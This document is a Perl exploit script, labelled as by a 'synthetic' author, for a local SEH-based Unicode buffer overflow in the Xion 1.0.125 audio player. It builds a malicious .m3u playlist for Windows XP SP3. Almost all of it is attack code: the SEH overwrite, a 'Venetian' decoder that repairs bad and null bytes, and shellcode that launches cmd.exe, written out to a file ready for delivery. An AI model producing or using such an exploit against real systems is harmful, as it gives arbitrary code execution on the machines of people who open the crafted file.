UTF-16LE SEH exploit. Win 5.1.2800 "Venetian technique"

1. #!/usr/bin/perl
2. # ########################################################################
3. # Title:                Xion 1.0.125 (.m3u File) Local SEH-based Unicode The “Venetian” Exploit
4. # Vulnerability Type:   Execute Code, Overflow UTF-16LE buffer, Memory corruption
5. # Date:                 Feb 18, 2018
6. # Author:               James Anderson (synthetic)
7. # Original Advisory:    http://www.exploit-db.com/exploits/14517 (hadji samir) Published: 2010-07-31
8. # Exploit mitigation:   There is no /SAFESEH, SEHOP, /GS, DEP, ASLR
9. # About:                The technique is taken from that paper: Creating
10. #                       Arbitrary Shellcode In Unicode Expanded Strings Chris Anley
11. # Tested on:            Win NT 5.1.2600 EN: Windows XP SP3 Eng Pro, Intel x86-32
12. # ########################################################################
13. #                   _   _          _   _      
14. #   ___ _   _ _ __ | |_| |__   ___| |_(_) ___
15. #  / __| | | | '_ \| __| '_ \ / _ \ __| |/ __|
16. #  \__ \ |_| | | | | |_| | | |  __/ |_| | (__
17. #  |___/\__, |_| |_|\__|_| |_|\___|\__|_|\___|
18. #       |___/                                        
19. #
20. # ########################################################################
21.                                          
22.  my $path = "/media/s4/DragonR.m3u";
23.  
24.  my $buffer_length = 5000;
25.  my $suboffset = 0x104;
26.  my $NOP1 = "\x6F"; # add [edi], ch
27.  my $NOP2 = $NOP1."\x59"; # add [edi], ch # pop ecx
28.  
29.  # [0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Offset to SEH frame
30.  my $crash = "A" x 260;
31.  # [1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Set SEH frame
32.  $crash .= "\x61".$NOP1; # popad # NOP-eq; nSEH; popad puts an address close to the buffer in EAX
33.  $crash .= "\x79\x41"; # pop r32 pop r32 ret; SEh. address for no /SAFESEH / SEHOP, DEP, ASLR
34.  
35.  my $offset_to_payload = length($crash);
36.  
37.  # [2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ settingcode.
38.     # [2.0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ set ecx=2 and eax -> [shellcode]
39.     $crash .= $NOP1; # NOP-eq
40.     $crash .= "\x6a\x59"; # push 0 # pop ecx
41.     $crash .= $NOP1; # NOP-eq
42.     $crash .= "\x41"; # inc ecx
43.     $crash .= "\xCC"; # add ah, cl # eax = eax + 0x100
44.     $crash .= $NOP1; # NOP-eq
45.     $crash .= "\x41"; # inc ecx
46.     $crash .= "\xC8"; # add al, cl
47.     $crash .= "\xC8"; # add al, cl # eax = eax+2+2;# and as a result: eax = eax + $suboffset(0x104) # EAX -> SC;
48.  
49.     # [2.1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ we're correcting the first BAD character
50.     $crash .= $NOP1; # NOP-eq
51.     $crash .= "\xba\x3b\x41"; # mov edx, 41003b00
52.     $crash .= "\x30"; # add [eax],dh         
53.     $crash .= $NOP1; # NOP-eq
54.  
55.     # [2.2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the second byte and the first 00
56.     $crash .= "\x40"; # inc eax
57.     $crash .= $NOP1; # NOP-eq
58.     $crash .= "\xba\xec\x41"; # mov edx, 4100ec00
59.     $crash .= "\x30"; # add [eax],dh       
60.  
61.     # [2.3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the fourth byte 00. BAD char
62.     $crash .= "\xC8"; # add al, cl # eq eax + 2
63.     $crash .= $NOP1; # NOP-eq
64.     $crash .= "\xba\x45\x41"; # mov edx, 41004500
65.     $crash .= "\x30"; # add [eax],dh
66.     $crash .= $NOP1; # NOP-eq
67.     $crash .= "\xba\x46\x41"; # mov edx, 41004600
68.     $crash .= "\x30"; # add [eax],dh
69.  
70.     # [2.4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
71.     $crash .= "\xC8"; # add al, cl # eq eax + 2
72.     $crash .= $NOP1; # NOP-eq
73.     $crash .= "\xba\x68\x41"; # mov edx, 41006800
74.     $crash .= "\x30"; # add [eax],dh
75.  
76.     # [2.5] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
77.     $crash .= "\xC8"; # add al, cl # eq eax + 2
78.     $crash .= $NOP1; # NOP-eq
79.     $crash .= "\xba\x78\x41"; # mov edx, 41007800
80.     $crash .= "\x30"; # add [eax],dh
81.  
82.     # [2.6] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
83.     $crash .= "\xC8"; # add al, cl # eq eax + 2
84.     $crash .= $NOP1; # NOP-eq
85.     $crash .= "\xba\x2F\x41"; # mov edx, 41002F00
86.     $crash .= "\x30"; # add [eax],dh
87.  
88.     # [2.7] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
89.     $crash .= "\xC8"; # add al, cl # eq eax + 2
90.     $crash .= $NOP1; # NOP-eq
91.     $crash .= "\xba\x63\x41"; # mov edx, 41006300
92.     $crash .= "\x30"; # add [eax],dh
93.  
94.     # [2.8] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
95.     $crash .= "\xC8"; # add al, cl # eq eax + 2
96.     $crash .= $NOP1; # NOP-eq
97.     $crash .= "\xba\x64\x41"; # mov edx, 41006400
98.     $crash .= "\x30"; # add [eax],dh
99.  
100.     # [2.8] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
101.     $crash .= "\xC8"; # add al, cl # eq eax + 2
102.     $crash .= $NOP1; # NOP-eq
103.     $crash .= "\xba\x8d\x41"; # mov edx, 41008d00
104.     $crash .= "\x30"; # add [eax],dh
105.  
106.     # [2.9] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
107.     $crash .= "\xC8"; # add al, cl # eq eax + 2
108.     $crash .= $NOP1; # NOP-eq
109.     $crash .= "\xba\xf8\x41"; # mov edx, 4100f800
110.     $crash .= "\x30"; # add [eax],dh
111.  
112.     # [2.10] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
113.     $crash .= "\xC8"; # add al, cl # eq eax + 2
114.     $crash .= $NOP1; # NOP-eq
115.     $crash .= "\xba\xb8\x41"; # mov edx, 4100b800
116.     $crash .= "\x30"; # add [eax],dh
117.  
118.     # [2.11] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
119.     $crash .= "\xC8"; # add al, cl # eq eax + 2
120.     $crash .= $NOP1; # NOP-eq
121.     $crash .= "\xba\x49\x41"; # mov edx, 41004900
122.     $crash .= "\x30"; # add [eax],dh
123.     $crash .= $NOP1; # NOP-eq
124.     $crash .= "\xba\x4A\x41"; # mov edx, 41004A00
125.     $crash .= "\x30"; # add [eax],dh
126.  
127.     # [2.12] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
128.     $crash .= "\xC8"; # add al, cl # eq eax + 2
129.     $crash .= $NOP1; # NOP-eq
130.     $crash .= "\xba\x77\x41"; # mov edx, 41007700
131.     $crash .= "\x30"; # add [eax],dh
132.  
133.     # [2.13] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
134.     $crash .= "\xC8"; # add al, cl # eq eax + 2
135.     $crash .= $NOP1; # NOP-eq
136.     $crash .= "\xba\xd0\x41"; # mov edx, 4100d000
137.     $crash .= "\x30"; # add [eax],dh
138.  
139.  # [3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # -4: one more NOP below # -8: sizeof(SEHframe)
140.                              # *2: for UTF-16 # /4: 2 for UTF-16 and 2 for the 2-byte-NOP
141.  $crash .= $NOP2 x (($suboffset - 4 - 8 - (length($crash)*2 - $offset_to_payload*2))/4); # NOP-eq + pop ecx
142.  $crash .= $NOP1."\x6A"; # NOP1 + NOP1-eq (push 0)
143.  
144.  
145.  # [4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ shellcode. left - ^jalousie; right - actual shellcode that will be crafted. CMD=cmd.exe
146. my $shellcode =
147. "\x50". # "\x8b". # # BAD BYTE
148.     # "\xec". # 0
149. "\x55". # "\x55".
150.     # "\x8b". # 0   # BAD BYTE  
151. "\xec". # "\xec".
152.     # "\x68". # 0
153. "\x65". # "\x65".
154.     # "\x78". # 0
155. "\x65". # "\x65".
156.     # "\x2F". # 0
157. "\x68". # "\x68".
158.     # "\x63". # 0
159. "\x6d". # "\x6d".
160.     # "\x64". # 0
161. "\x2e". # "\x2e".
162.     # "\x8d". # 0
163. "\x45". # "\x45".
164.     # "\xf8". # 0
165. "\x50". # "\x50".
166.     # "\xb8". # 0
167. "\xc7". # "\xc7".
168.     # "\x93". # 0   # BAD BYTE  
169. "\xc2". # "\xc2".
170.     # "\x77". # 0
171. "\xff"; # "\xff".
172.     # "\xd0"; # 0
173.  
174.  $crash .= $shellcode;
175.  
176.  $crash .= "C" x ($buffer_length - length($crash));
177.  open(myfile, ">$path");
178.  print myfile $crash;